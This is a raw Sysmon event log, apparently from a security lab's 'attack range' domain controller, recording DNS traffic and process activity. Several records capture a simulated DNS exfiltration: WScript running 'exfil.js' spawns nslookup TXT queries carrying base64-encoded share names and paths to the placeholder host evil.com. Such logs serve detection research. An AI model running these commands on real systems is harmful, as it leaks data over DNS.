354300x8000000000000000216249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.247{00000000-0000-0000-0000-000000000000}2060<unknown process>-udptruefalse127.0.0.1-51360-false127.0.0.1-53domain 354300x8000000000000000216248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.247{00000000-0000-0000-0000-000000000000}2060<unknown process>-udpfalsefalse127.0.0.1-51359-false127.0.0.1-53domain 354300x8000000000000000216247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.247{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51359- 354300x8000000000000000216246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.247{00000000-0000-0000-0000-000000000000}2060<unknown process>-udptruefalse127.0.0.1-51359-false127.0.0.1-53domain 354300x8000000000000000216245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.183{00000000-0000-0000-0000-000000000000}7628<unknown process>-udpfalsefalse127.0.0.1-51358-false127.0.0.1-53domain 354300x8000000000000000216244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.183{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51358- 354300x8000000000000000216243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.183{00000000-0000-0000-0000-000000000000}7628<unknown process>-udptruefalse127.0.0.1-51358-false127.0.0.1-53domain 354300x8000000000000000216242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.183{00000000-0000-0000-0000-000000000000}7628<unknown process>-udpfalsefalse127.0.0.1-51357-false127.0.0.1-53domain 354300x8000000000000000216241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.183{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51357- 354300x8000000000000000216240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.183{00000000-0000-0000-0000-000000000000}7628<unknown process>-udptruefalse127.0.0.1-51357-false127.0.0.1-53domain 354300x8000000000000000216239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.183{00000000-0000-0000-0000-000000000000}7628<unknown process>-udpfalsefalse127.0.0.1-51356-false127.0.0.1-53domain 354300x8000000000000000216238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.183{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51356- 354300x8000000000000000216237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.183{00000000-0000-0000-0000-000000000000}7628<unknown process>-udptruefalse127.0.0.1-51356-false127.0.0.1-53domain 354300x8000000000000000216236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.122{00000000-0000-0000-0000-000000000000}988<unknown process>-udpfalsefalse127.0.0.1-51355-false127.0.0.1-53domain 354300x8000000000000000216235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.122{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51355- 354300x8000000000000000216234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.122{00000000-0000-0000-0000-000000000000}988<unknown process>-udptruefalse127.0.0.1-51355-false127.0.0.1-53domain 10341000x8000000000000000216233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.423{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9A46-000000005F02}7588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000216232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.122{00000000-0000-0000-0000-000000000000}988<unknown process>-udpfalsefalse127.0.0.1-51354-false127.0.0.1-53domain 354300x8000000000000000216231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.121{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51354- 354300x8000000000000000216230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.121{00000000-0000-0000-0000-000000000000}988<unknown process>-udptruefalse127.0.0.1-51354-false127.0.0.1-53domain 354300x8000000000000000216229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.121{00000000-0000-0000-0000-000000000000}988<unknown process>-udpfalsefalse127.0.0.1-51353-false127.0.0.1-53domain 354300x8000000000000000216228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.121{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51353- 354300x8000000000000000216227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.121{00000000-0000-0000-0000-000000000000}988<unknown process>-udptruefalse127.0.0.1-51353-false127.0.0.1-53domain 354300x8000000000000000216226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.056{00000000-0000-0000-0000-000000000000}5944<unknown process>-udpfalsefalse127.0.0.1-51352-false127.0.0.1-53domain 354300x8000000000000000216225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.056{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51352- 354300x8000000000000000216224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.056{00000000-0000-0000-0000-000000000000}5944<unknown process>-udptruefalse127.0.0.1-51352-false127.0.0.1-53domain 354300x8000000000000000216223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.056{00000000-0000-0000-0000-000000000000}5944<unknown process>-udpfalsefalse127.0.0.1-51351-false127.0.0.1-53domain 354300x8000000000000000216222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.056{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51351- 354300x8000000000000000216221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.055{00000000-0000-0000-0000-000000000000}5944<unknown process>-udptruefalse127.0.0.1-51351-false127.0.0.1-53domain 354300x8000000000000000216220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.055{00000000-0000-0000-0000-000000000000}5944<unknown process>-udpfalsefalse127.0.0.1-51350-false127.0.0.1-53domain 354300x8000000000000000216219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.055{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51350- 354300x8000000000000000216218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.055{00000000-0000-0000-0000-000000000000}5944<unknown process>-udptruefalse127.0.0.1-51350-false127.0.0.1-53domain 354300x8000000000000000216217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.988{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51349- 354300x8000000000000000216216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.898{00000000-0000-0000-0000-000000000000}5088<unknown process>-udpfalsefalse127.0.0.1-51348-false127.0.0.1-53domain 354300x8000000000000000216215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.898{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51348- 354300x8000000000000000216214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.897{00000000-0000-0000-0000-000000000000}5088<unknown process>-udptruefalse127.0.0.1-51348-false127.0.0.1-53domain 354300x8000000000000000216213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.897{00000000-0000-0000-0000-000000000000}5088<unknown process>-udpfalsefalse127.0.0.1-51347-false127.0.0.1-53domain 354300x8000000000000000216212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.897{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51347- 354300x8000000000000000216211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.897{00000000-0000-0000-0000-000000000000}5088<unknown process>-udptruefalse127.0.0.1-51347-false127.0.0.1-53domain 354300x8000000000000000216210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.897{00000000-0000-0000-0000-000000000000}5088<unknown process>-udpfalsefalse127.0.0.1-51346-false127.0.0.1-53domain 354300x8000000000000000216209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.897{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51346- 354300x8000000000000000216208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.897{00000000-0000-0000-0000-000000000000}5088<unknown process>-udptruefalse127.0.0.1-51346-false127.0.0.1-53domain 354300x8000000000000000216207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.795{00000000-0000-0000-0000-000000000000}8156<unknown process>-udpfalsefalse127.0.0.1-51345-false127.0.0.1-53domain 10341000x8000000000000000216206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.407{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.407{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9946-000000005F02}2236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.407{2E1864BB-18E0-629A-6742-000000005F02}39762512C:\Windows\System32\WScript.exe{2E1864BB-1901-629A-9946-000000005F02}2236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.414{2E1864BB-1901-629A-9946-000000005F02}2236C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkpa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.407{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltqk.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.354{2E1864BB-1901-629A-9746-000000005F02}75287436C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9846-000000005F02}7360C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.354{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9846-000000005F02}7360C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.354{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.354{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.338{2E1864BB-1901-629A-9646-000000005F02}53326224C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-9846-000000005F02}7360C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.353{2E1864BB-1901-629A-9846-000000005F02}7360C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1901-629A-9646-000000005F02}5332C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqk.tmp 2>&1 10341000x8000000000000000216190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.322{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9746-000000005F02}7528C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.322{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9746-000000005F02}7528C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 